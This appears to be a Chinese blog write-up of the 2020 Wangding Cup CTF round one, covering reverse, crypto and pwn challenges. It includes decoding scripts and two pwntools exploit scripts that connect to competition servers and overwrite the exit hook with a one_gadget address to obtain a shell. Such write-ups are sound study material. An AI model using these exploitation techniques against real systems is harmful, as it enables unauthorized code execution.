网鼎杯第一场 部分re crypto pwn 题解

最新推荐文章于 2023-10-09 15:42:03 发布
最新推荐文章于 2023-10-09 15:42:03 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: CTF crypto 逆向之旅 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/106047130
版权

这次没想到还拿了一道re的一血 能去线下了= = 

题目名称 re bang

 

一看题目就知道需要dump dex 正好手边手机开启了frida 直接dump dex 脚本一把梭,然后直接反编译 发现flag

拿到了一血,如果不是怀疑flag是假的 估计更快。。

题目名称 re signal

这个题目 自己实现了vm

自己写了一个脚本(不要吐槽我的拼音,当时有点着急 就没有想那么多)

自己写了一个python代码模拟了一下


lists=[10,4,16,8,3,5,1,4,32,8,5,3,1,3,2,8,11,1,12,8,4,4,1,5,3,8,3,33,1,11,8,11,1,4,9,8,3,32,1,2,81,8,4,36,1,12,8,11,1,5,2,8,2,37,1,2,54,8,4,65,1,2,32,8,5,1,1,5,3,8,2,37,1,4,9,8,3,32,1,2,65,8,12,1,7,34,7,63,7,52,7,50,7,114,7,51,7,24,7,167,7,49,7,241,7,40,7,132,7,193,7,30,7,122]

sums=0
xiangjia=0
cmp_index=0
idnex=0
cmpls=[]
while(1):
	if sums>=114:
		break
	#print sums
	x=lists[sums]
	try:
		if x==1:
			print("fuzhi")
			xiangjia=xiangjia+1
			sums+=1
		if x==2:
			print("xiangjia")
			print(xiangjia,lists[sums+1])
			sums+=2
		if x==3:
			print("xiangjian")
			print(xiangjia,lists[sums+1])
			sums+=2
		if x==4:
			print("yihuo")
			print(xiangjia,lists[sums+1])
			sums+=2
		if x==5:
			print("chengfa")
			print(xiangjia,lists[sums+1])
			sums+=2
		if x==6:
			print("zizhenzijia")
			sums+=1
		if x==7:
			print("bijiao")
			print(lists[sums+1],idnex)
			cmpls.append(lists[sums+1])
			sums+=2
			idnex+=1

		if x==8:
			print("jieguofuzhi")
			sums+=1
		if x==10:
			print("duqu")
			sums+=1		

		if x==11:
			print("jianyi")
			print(xiangjia)
			sums+=1
		if x==12:
			print("jiayi")
			print(xiangjia)
			sums+=1
	except Exception as e:
		raise	

print(cmpls)
然后根据出来的值 直接倒推就ok

 其实可以把控制指令反过来 然后指令也翻过来就能直接跑出来flag。这懒得写了

 

题目名称 re jocker

这题目 实现了smc 并且对抗了一下f5 直接idc 去掉smc 然后 修改一下栈针

清晰出来f5

可以根据encrypt 函数直接逆向出来前19位
x=[0x66,0x6b,0x63,0x64,0x7f,0x61,0x67,0x64,0x3b,0x56,0x6b,0x61,0x7b,0x26,0x3b,0x50,0x63,0x5f,0x4d,0x5a,0x71,0xc,0x37,0x66]
for i in range(0,len(x)):
	if i%2==1:
		x[i]=x[i]+i
	else:
		x[i]=x[i]^i

flag=""
for i in range(0,len(x)):
	flag+=chr(x[i])
print(flag)
xor_str="hahahaha_do_you_find_me?"
x=[
  0x0E, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x09, 0x00, 
  0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 
  0x05, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x56, 0x00, 
  0x00, 0x00, 0x3E, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 
  0x0C, 0x00, 0x00, 0x00, 0x3C, 0x00, 0x00, 0x00, 0x1F, 0x00, 
  0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 
  0x6B, 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x59, 0x00, 
  0x00, 0x00, 0x0D, 0x00, 0x00, 0x00]
flag=""
print
for i in range(19):
	print(x[i*4])
	flag+=chr(ord(xor_str[i])^x[i*4])
print(flag)
#flag{d07abccf8a410c
然后看到finally函数

 

发现自己一脸懵。。然后试着 去让v7^某个值='}'

交上去发现对了。。。

题目名称:crypto boom

就简单的条件 符合就ok z3一把梭

题目名称:you raise me up. 

sage直接跑。。

pwn题就直接问的pwn手思路 自己没有调试。。

题目名称:boom1

我还以为这个是ollvm 发现这分发快和后继块怎么那么多,,,,  = = 

结果改了改脚本 发现把虚拟机卡死了

后来才听说是作者自己写的while 并不是用的ollvm混淆 。 。。 。

然后开始搞 这两个pwn题都是用到了 一个知识点 就是 malloc 如果块大的话 就会和ld 挨到一块

exit hook 的地址 就在ld里面

那么如果是同一个libc 那么这个偏移就固定  pwn1是实现了一个c语言的编译器 

然后根据全局变量就可以确定偏移 然后根据偏移往上面写 one_addr  可以getshell

import sys
from pwn import *
from ctypes import *
from pwn_debug.pwn_debug import *
binary='./pwn'
def change_ld(binary, ld):
    """
    Force to use assigned new ld.so by changing the binary
    """
    if not os.access(ld, os.R_OK): 
        log.failure("Invalid path {} to ld".format(ld))
        return None
 
         
    if not isinstance(binary, ELF):
        if not os.access(binary, os.R_OK): 
            log.failure("Invalid path {} to binary".format(binary))
            return None
        binary = ELF(binary)
 
    for segment in binary.segments:
        if segment.header['p_type'] == 'PT_INTERP':
            size = segment.header['p_memsz']
            addr = segment.header['p_paddr']
            data = segment.data()
            if size <= len(ld):
                log.failure("Failed to change PT_INTERP from {} to {}".format(data, ld))
                return None
            binary.write(addr, ld.ljust(size, '\0'))
            if not os.access('./Pwn', os.F_OK): os.mkdir('./Pwn')
            path = './Pwn/{}_debug'.format(os.path.basename(binary.path))
            if os.access(path, os.F_OK): 
                os.remove(path)
                info("Removing exist file {}".format(path))
            binary.save(path)    
            os.chmod(path, 0b111000000) #rwx------
    success("PT_INTERP has changed from {} to {}. Using temp file {}".format(data, ld, path)) 
    return ELF(path)

# LD=change_ld('./main','./ld-2.23.so')
# io = LD.process(env={'LD_PRELOAD':'./libc-2.23.so'})
io=remote('182.92.73.10',24573)

context.log_level='debug'
# while True :


io.recv()
# gdb.attach(io)
pay = '''
char *a,*b,*d;
int main()
{
a="keer";
b=a-0x529028;
a=b+0x5f0048;
a[0]=0;
a=a+0xf00;
d=b+0xCD0F3;
a[0]=d&0xFF;
a[1]=(d>>8)&0xff;
a[2]=(d>>16)&0xff;
}'''
pay = pay.replace('\n','')
io.sendline(pay)
io.recv()


io.interactive()

其中a的地址就是exit_hook  d的就是one

题目名称:boom2

这个题目就复杂了一些 是vmpwn   这个vm  实现了比较好的功能

先是初始化了栈

然后实现了很多功能 其中就是 

实现了函数头的 sub esp xx  mov esp ebp  

然后这里如果控制住了 esp  比如是 exit hook  然后 往里面写 one 就可以控制权限了

import sys
from pwn import *
context.log_level='debug'
context.arch='amd64'
def change_ld(binary, ld):
    """
    Force to use assigned new ld.so by changing the binary
    """
    if not os.access(ld, os.R_OK): 
        log.failure("Invalid path {} to ld".format(ld))
        return None
 
         
    if not isinstance(binary, ELF):
        if not os.access(binary, os.R_OK): 
            log.failure("Invalid path {} to binary".format(binary))
            return None
        binary = ELF(binary)
 
    for segment in binary.segments:
        if segment.header['p_type'] == 'PT_INTERP':
            size = segment.header['p_memsz']
            addr = segment.header['p_paddr']
            data = segment.data()
            if size <= len(ld):
                log.failure("Failed to change PT_INTERP from {} to {}".format(data, ld))
                return None
            binary.write(addr, ld.ljust(size, '\0'))
            if not os.access('./Pwn', os.F_OK): os.mkdir('./Pwn')
            path = './Pwn/{}_debug'.format(os.path.basename(binary.path))
            if os.access(path, os.F_OK): 
                os.remove(path)
                info("Removing exist file {}".format(path))
            binary.save(path)    
            os.chmod(path, 0b111000000) #rwx------
    success("PT_INTERP has changed from {} to {}. Using temp file {}".format(data, ld, path)) 
    return ELF(path)

# LD=change_ld('./main','./ld-2.23.so')
# io = LD.process(env={'LD_PRELOAD':'./libc-2.23.so'})
io=remote("182.92.73.10",36642)


# io.recv()
# gdb.attach(io)
# pause()
off=-2992620
pay=flat([6,0x101f1,
0,0xbed,
9,
25,
6,-0x10ddf,
13,
off
])
io.sendline(pay)

 写的话 直接 push 操作就能控制了 这里如果看懂vm的话 就很简单了。。。

这次题目个人感觉难度是 re<crypto<pwn<web<misc = = 

pipixia233333
关注
专栏目录
护网杯部分题解
0verWatch的博客
10-14 4364
前言 护网杯的这次比赛还是很有收获的,至少在web方面我认为是这样的,还是得继续努力吧。。。 正文 MISC 迟来的签到 AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJVJVZUIyUnI18jVFNXVRs= 目说要异或,那就直接爆破异或就好 写个小脚本就可以得到flag import base64 a = &quot;AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJV...
2019SCUCTF部分题解
博客
05-20 1172
writeup2019SCUCTF部分题解赛前通知解思路flagweb来了老弟解思路flag你好呀解思路参考链接:flag简单的XSS解思路参考链接flag稍难一点的XSS解思路参考链接flagreshowme666解思路参考链接flagpwnbabystack解思路flaglogin解思路flagMISC流量分析解思路参考链接flagstream解思路flag婉姐姐的内存镜像...
网鼎杯密码
05-01
网鼎杯密码chaoyang.txt,加密方式暂不说,想知道解流程可以讨论
【2022 网鼎杯】青龙组 crypto WriteUp
u010883831的博客
09-01 863
2022 网鼎杯 青龙组 crypto Write-Up
Crypto 2020网鼎杯 you raise me up Writeup (离散对数)
01-20
关键点:离散对数、同余运算 知识点:Antigonae整理的相关概念 看不懂-.-以后再研究,简单理解为: 普通对数为 a ** x=b    (求x=logab) 离散对数为 a ** x=b % p 先会用SageMath~ 目 #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random n = 2 ** 512 m = random.randint(2, n-1) | 1 c = pow(m, bytes_to_long(flag), n) print 'm =
网鼎杯CRYPTO-shenyue2题解
测试
11-02 922
为RSA加密算法的变形,目给出了p、d之间的关系使得RSA算法可以被攻破,解用到了费马小定理RSA相关 费马小定理其内容为: 假如p是质数,且gcd(a,p)=1,那么 a^(p-1)≡1(mod p),例如:假如a是整数,p是质数,则a,p显然互质(即两者只有一个公约数1),那么我们可以得到费马小定理的一个特例,即当p为质数时候, a^(p-1)≡1(mo...
[网鼎杯 2022] crypto582 重作
weixin_52640415的博客
10-04 498
矩阵快速幂 学习中
2020 DASCTF&BJD 部分题解
ZZ100861122的博客
12-28 1082
呜呜圣诞节还要打比赛我太难了,但结果还不错的样子~ 没有0解 拿了FakePic的一血 混进了前四十有电子证书(呜呜,学到现在终于要有证书了) 下面就是WP了 Misc 马老师的秘籍 下载得到一张全是二维码的图片,扫描了几个发现每个二维码都是马老师经典语录中的3个字,没发现什么有用的信息。怀疑要么flag在其中的几张二维码里,要么是全部扫出来连起来是密文,然后卡了好久…过了半小时,才想起来misc拿到图片不应该先看看是不是可以分离吗… 于是binwalk一番发现含有zip,用foremost分离,得到压
【ctf】第一届浙江师范大学网络与信息安全校赛wp
woodwhale的博客
05-11 4357
【ctf】第一届浙江师范大学网络与信息安全校赛wp 前言 第一次参加正式的ctf比赛,恰巧碰到了自己学校的第一届校赛。分享一下菜狗的做心路历程。 热身 1.网络安全法(解出) 网络安全法2016-11-07颁布 得到flag{2016-11-07} WEB 1.web签到(解出) <?php show_source(__file__); @eval($_POST['zjnuctf']); ?> 由于自己的hackbar有问(这里卡了好久发现是hackbar的问),直接bp抓包,get
CTF | CTF比赛题解分享
hackzkaq的博客
10-09 7755
前言:由于此次比赛的目较多,所以这是这个比赛的第一篇wp,共20,先记录一下,防止忘记。里面有些目是新手较为简单,但也有许多有意思的目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
【CTF WriteUp】2020网鼎杯第一场部分题解
01-20
(好难啊~~~) Crypto boom 本地运行,过三关。第一关找个东西md5值等于给定值,破解一下得到en5oy;第二关解三元一次方程,得x=74, y=68, z=31;第三关解一元二次方程,找正数根x=89127561。全过得flag you raise me up 本中,模数n = 2 ** 512,所以此处可以使用Pohlig-Hellman算法逐渐升模求出flag。该算法的原理核心,在于已知x % 2 ** k的情况下,如何求出x % 2 ** (k+1)。 (i)当k = 0时,2 ** k = 1,显然有bytes_to_len(flag) = x % 2 ** k = 0
网鼎杯-第三场-逆向-babyre
08-27
2018年8月27日网鼎杯第三场逆向-babyre
网鼎杯-第三场-加解密-hafuhafu
08-27
2018年8月27日网鼎杯|第三场|加解密|
crypto405-grasshopper(网鼎杯2022)
耐酸碱高温固化材料近距离传输研究
10-17 184
大概的逻辑是p是16bit素数,k是5维向量,元素大小在1到p之间。flag为长度为42的字符串。最后推出mod p意义下。借鉴了以下这位师傅的解法。
crypto581-easywork(网鼎杯2022)
耐酸碱高温固化材料近距离传输研究
10-16 511
求出a,b,p后问就变为解决my_func()函数递归时间复杂度的问。基本的逻辑是已知LCG随机数种子和前6个随机数,要反推参数a,b和p。然后根据sol的算法解出flag。lcg-5这种情况,推演一下设。LCG,整理一下做法。
Java pwn_2020网鼎杯部分WEB&&PWN题解
weixin_29956903的博客
02-26 975
今年网鼎杯不说啥了,没打进前130,我是菜B比不过各位师傅本文包括四场网鼎的部分WEB和PWN,本着菜鸡应该多练习的原则四场都看了看,除第一场外均为复现。青龙组PWN-boom1[*] '/home/Railgun/Desktop/2020wdb/pwn1'Arch: amd64-64-littleRELRO: Full RELROStack: Canary foundNX: ...
crypto162-davidhomework(网鼎杯2022)
耐酸碱高温固化材料近距离传输研究
10-17 161
目中首先给出一个由100个向量组成的数组cof_t,然后循环100次,每次取一个向量计算cal结果进行累加。在解时需要解出这个累加和,由于递归次数过大为20w次,所以考虑使用快速幂方法计算。
网鼎杯2020Cryptoboom
qq_44060093的博客
05-10 858
打开目,发现是一个exe文件,果断ida打开 发现是一个算法,然后得到flag __main(); menu(); system("pause"); system("cls"); v7 = 70; v8 = 229; v9 = 239; v10 = 230; v11 = 22; v12 = 90; v13 = 90; v14 = 251; v15 = 54; v16 = 18; v17 = 23; v18 = 68; v19 = 106;.
【CTF WriteUp】2020网鼎杯第一场Crypto题解
cccchhhh6819的博客
05-10 7249
(好难啊~~~) Crypto boom 本地运行,过三关。第一关找个东西md5值等于给定值,破解一下得到en5oy;第二关解三元一次方程,得x=74, y=68, z=31;第三关解一元二次方程,找正数根x=89127561。全过得flag you raise me up 本中,模数n = 2 ** 512,所以此处可以使用Pohlig-Hellman算法逐渐升模求出flag。该算法的原理核心,在于已知x % 2 ** k的情况下,如何求出x % 2 ** (k+1)。 (i)当k = 0时,2 **
全栈/Web/Misc/Crypto/Pwn/Re/IoT
最新发布
11-04
全栈是指掌握多种技能的人,能够独立完成一个完整的项目。Web是指基于Web的应用程序,包括前端和后端。Misc是指杂项,包括各种不同类型的目,如图片隐写、二进制分析等。Crypto是指密码学,包括加密、解密、签名等。Pwn是指利用漏洞攻击程序,获取程序的控制权。Re是指逆向工程,包括反汇编、调试等。IoT是指物联网,包括各种智能设备和传感器。这些都是CTF比赛中常见的方向。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值